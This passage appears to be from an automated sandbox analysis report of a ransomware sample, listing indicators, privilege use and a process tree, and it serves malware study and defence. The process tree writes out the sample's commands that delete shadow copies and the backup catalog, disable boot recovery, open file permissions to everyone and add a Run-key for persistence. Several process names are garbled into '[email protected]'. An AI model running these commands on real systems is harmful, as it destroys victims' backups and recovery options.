5a750d7052c37e8034bade961a0026ef5f2f0c5b2ed5bb7dcfa945c779e13a57f52ad95f2f8933bde8b5c5bca5a525b60af14f74befa3fb9f40956d3154fc42d3c7461f23add90f48709ad9757871d1724334756e5759c2025c266029cf2319168e8843a5d4e4cb08fb231143e843297262a1a95d5e08d490aeb8d8ce14c2d055f286f6c49343776661c0b9e841d7977860036e4a72aea5d17dba109e866c1b8ab95933f8ebc490bef1b9	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	MBAMService.exe

NTFS ADS 4 IoCs

Processes:

firefox.exeMBAMInstallerService.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\wanakiwi.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\MBSetup.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\avast_one_free_antivirus.exe:Zone.Identifier	firefox.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe\:Zone.Identifier:$DATA	MBAMInstallerService.exe

Runs regedit.exe 1 IoCs

Processes:

regedit.exe

pid process

7472 regedit.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 612 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
7472	regedit.exe

description	flow	ioc
HTTP User-Agent header	612	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskhsvc.exewanakiwi.exewanakiwi.exeMBSetup.exe

pid	process
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
4384	taskhsvc.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5396	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
5572	wanakiwi.exe
3392	MBSetup.exe
3392	MBSetup.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

@[email protected]regedit.exe

pid process

68 @[email protected]
7472 regedit.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

636
636

pid	process
68	@[email protected]
7472	regedit.exe

pid	process
636
636

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

unregmp2.exevssvc.exeWMIC.exewmplayer.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exefirefox.exe

description	pid	process
Token: SeShutdownPrivilege	4728	unregmp2.exe
Token: SeCreatePagefilePrivilege	4728	unregmp2.exe
Token: SeBackupPrivilege	2932	vssvc.exe
Token: SeRestorePrivilege	2932	vssvc.exe
Token: SeAuditPrivilege	2932	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4012	WMIC.exe
Token: SeSecurityPrivilege	4012	WMIC.exe
Token: SeTakeOwnershipPrivilege	4012	WMIC.exe
Token: SeLoadDriverPrivilege	4012	WMIC.exe
Token: SeSystemProfilePrivilege	4012	WMIC.exe
Token: SeSystemtimePrivilege	4012	WMIC.exe
Token: SeProfSingleProcessPrivilege	4012	WMIC.exe
Token: SeIncBasePriorityPrivilege	4012	WMIC.exe
Token: SeCreatePagefilePrivilege	4012	WMIC.exe
Token: SeBackupPrivilege	4012	WMIC.exe
Token: SeRestorePrivilege	4012	WMIC.exe
Token: SeShutdownPrivilege	4012	WMIC.exe
Token: SeDebugPrivilege	4012	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4012	WMIC.exe
Token: SeRemoteShutdownPrivilege	4012	WMIC.exe
Token: SeUndockPrivilege	4012	WMIC.exe
Token: SeManageVolumePrivilege	4012	WMIC.exe
Token: 33	4012	WMIC.exe
Token: 34	4012	WMIC.exe
Token: 35	4012	WMIC.exe
Token: 36	4012	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4012	WMIC.exe
Token: SeSecurityPrivilege	4012	WMIC.exe
Token: SeTakeOwnershipPrivilege	4012	WMIC.exe
Token: SeLoadDriverPrivilege	4012	WMIC.exe
Token: SeSystemProfilePrivilege	4012	WMIC.exe
Token: SeSystemtimePrivilege	4012	WMIC.exe
Token: SeProfSingleProcessPrivilege	4012	WMIC.exe
Token: SeIncBasePriorityPrivilege	4012	WMIC.exe
Token: SeCreatePagefilePrivilege	4012	WMIC.exe
Token: SeBackupPrivilege	4012	WMIC.exe
Token: SeRestorePrivilege	4012	WMIC.exe
Token: SeShutdownPrivilege	4012	WMIC.exe
Token: SeDebugPrivilege	4012	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4012	WMIC.exe
Token: SeRemoteShutdownPrivilege	4012	WMIC.exe
Token: SeUndockPrivilege	4012	WMIC.exe
Token: SeManageVolumePrivilege	4012	WMIC.exe
Token: 33	4012	WMIC.exe
Token: 34	4012	WMIC.exe
Token: 35	4012	WMIC.exe
Token: 36	4012	WMIC.exe
Token: SeShutdownPrivilege	1696	wmplayer.exe
Token: SeCreatePagefilePrivilege	1696	wmplayer.exe
Token: SeTcbPrivilege	2980	taskse.exe
Token: SeTcbPrivilege	2980	taskse.exe
Token: SeTcbPrivilege	3896	taskse.exe
Token: SeTcbPrivilege	3896	taskse.exe
Token: SeTcbPrivilege	5892	taskse.exe
Token: SeTcbPrivilege	5892	taskse.exe
Token: SeTcbPrivilege	5180	taskse.exe
Token: SeTcbPrivilege	5180	taskse.exe
Token: SeTcbPrivilege	5980	taskse.exe
Token: SeTcbPrivilege	5980	taskse.exe
Token: SeTcbPrivilege	5788	taskse.exe
Token: SeTcbPrivilege	5788	taskse.exe
Token: SeDebugPrivilege	3772	firefox.exe
Token: SeDebugPrivilege	3772	firefox.exe
Token: SeDebugPrivilege	3772	firefox.exe

Suspicious use of FindShellTrayWindow 14 IoCs

Processes:

iexplore.exewmplayer.exefirefox.exe@[email protected]MBSetup.exeMalwarebytes.exe

pid	process
720	iexplore.exe
1696	wmplayer.exe
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
68	@[email protected]
3392	MBSetup.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe

Suspicious use of SendNotifyMessage 9 IoCs

Processes:

firefox.exeMalwarebytes.exe

pid	process
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe
7408	Malwarebytes.exe

Suspicious use of SetWindowsHookEx 46 IoCs

Processes:

iexplore.exeIEXPLORE.EXE@[email protected]@[email protected]@[email protected]@[email protected]firefox.exe@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]avast_one_free_antivirus.exe@[email protected]MBSetup.exe@[email protected]@[email protected]@[email protected]@[email protected]LogonUI.exe

pid	process
720	iexplore.exe
720	iexplore.exe
1268	IEXPLORE.EXE
1268	IEXPLORE.EXE
2832	@[email protected]
2832	@[email protected]
2388	@[email protected]
2388	@[email protected]
68	@[email protected]
68	@[email protected]
3656	@[email protected]
3772	firefox.exe
5860	@[email protected]
3404	@[email protected]
6056	@[email protected]
5696	@[email protected]
2660	@[email protected]
1912	@[email protected]
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
6032	@[email protected]
5320	@[email protected]
2704	@[email protected]
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
5644	@[email protected]
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
5444	avast_one_free_antivirus.exe
5896	@[email protected]
3772	firefox.exe
3772	firefox.exe
3772	firefox.exe
3392	MBSetup.exe
3760	@[email protected]
6464	@[email protected]
7576	@[email protected]
8188	@[email protected]
6244	LogonUI.exe
6244	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.execmd.exeiexplore.execmd.exe@[email protected]wmplayer.exeunregmp2.exe@[email protected]cmd.exesetup_wm.exe

description	pid	process	target process
PID 4888 wrote to memory of 320	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 4888 wrote to memory of 320	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 4888 wrote to memory of 320	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 4888 wrote to memory of 4652	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 4888 wrote to memory of 4652	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 4888 wrote to memory of 4652	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 4888 wrote to memory of 4036	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4888 wrote to memory of 4036	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4888 wrote to memory of 4036	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4888 wrote to memory of 3560	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4888 wrote to memory of 3560	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4888 wrote to memory of 3560	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 3560 wrote to memory of 2144	3560	cmd.exe	cscript.exe
PID 3560 wrote to memory of 2144	3560	cmd.exe	cscript.exe
PID 3560 wrote to memory of 2144	3560	cmd.exe	cscript.exe
PID 4888 wrote to memory of 3976	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 4888 wrote to memory of 3976	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 4888 wrote to memory of 3976	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 720 wrote to memory of 1268	720	iexplore.exe	IEXPLORE.EXE
PID 720 wrote to memory of 1268	720	iexplore.exe	IEXPLORE.EXE
PID 720 wrote to memory of 1268	720	iexplore.exe	IEXPLORE.EXE
PID 4888 wrote to memory of 2832	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4888 wrote to memory of 2832	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4888 wrote to memory of 2832	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4888 wrote to memory of 4332	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4888 wrote to memory of 4332	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4888 wrote to memory of 4332	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4332 wrote to memory of 2388	4332	cmd.exe	@[email protected]
PID 4332 wrote to memory of 2388	4332	cmd.exe	@[email protected]
PID 4332 wrote to memory of 2388	4332	cmd.exe	@[email protected]
PID 2832 wrote to memory of 4384	2832	@[email protected]	taskhsvc.exe
PID 2832 wrote to memory of 4384	2832	@[email protected]	taskhsvc.exe
PID 2832 wrote to memory of 4384	2832	@[email protected]	taskhsvc.exe
PID 4540 wrote to memory of 4804	4540	wmplayer.exe	setup_wm.exe
PID 4540 wrote to memory of 4804	4540	wmplayer.exe	setup_wm.exe
PID 4540 wrote to memory of 4804	4540	wmplayer.exe	setup_wm.exe
PID 4540 wrote to memory of 1736	4540	wmplayer.exe	unregmp2.exe
PID 4540 wrote to memory of 1736	4540	wmplayer.exe	unregmp2.exe
PID 4540 wrote to memory of 1736	4540	wmplayer.exe	unregmp2.exe
PID 1736 wrote to memory of 4728	1736	unregmp2.exe	unregmp2.exe
PID 1736 wrote to memory of 4728	1736	unregmp2.exe	unregmp2.exe
PID 2388 wrote to memory of 4336	2388	@[email protected]	cmd.exe
PID 2388 wrote to memory of 4336	2388	@[email protected]	cmd.exe
PID 2388 wrote to memory of 4336	2388	@[email protected]	cmd.exe
PID 4336 wrote to memory of 3320	4336	cmd.exe	vssadmin.exe
PID 4336 wrote to memory of 3320	4336	cmd.exe	vssadmin.exe
PID 4336 wrote to memory of 3320	4336	cmd.exe	vssadmin.exe
PID 4336 wrote to memory of 4012	4336	cmd.exe	WMIC.exe
PID 4336 wrote to memory of 4012	4336	cmd.exe	WMIC.exe
PID 4336 wrote to memory of 4012	4336	cmd.exe	WMIC.exe
PID 4804 wrote to memory of 1696	4804	setup_wm.exe	wmplayer.exe
PID 4804 wrote to memory of 1696	4804	setup_wm.exe	wmplayer.exe
PID 4804 wrote to memory of 1696	4804	setup_wm.exe	wmplayer.exe
PID 4888 wrote to memory of 3068	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4888 wrote to memory of 3068	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4888 wrote to memory of 3068	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4888 wrote to memory of 2980	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 4888 wrote to memory of 2980	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 4888 wrote to memory of 2980	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 4888 wrote to memory of 68	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4888 wrote to memory of 68	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4888 wrote to memory of 68	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4888 wrote to memory of 2164	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4888 wrote to memory of 2164	4888	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

3976 attrib.exe
320 attrib.exe

pid	process
3976	attrib.exe
320	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:320

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:4652

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 292871718292435.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:3560

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
3⤵
PID:2144

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
2⤵
- Views/modifies file attributes
PID:3976

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2832

C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4384

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
- Suspicious use of WriteProcessMemory
PID:4332

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] vs
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:4336

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
5⤵
- Interacts with shadow copies
PID:3320

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:3068

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:68

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "svgirwyi764" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
2⤵
PID:2164

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "svgirwyi764" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:4912

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:600

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3656

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5892

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5860

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:5996

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5180

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3404

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:5268

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5980

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6056

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:652

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5788

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5696

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:6116

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:4400

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2660

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:5152

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:3164

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1912

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2124

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:2696

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6032

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:5856

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:5232

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5320

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1348

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:3332

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2704

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:5388

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:5752

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5644

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:4740

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:496

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5896

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:5152

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
PID:2236

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3760

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
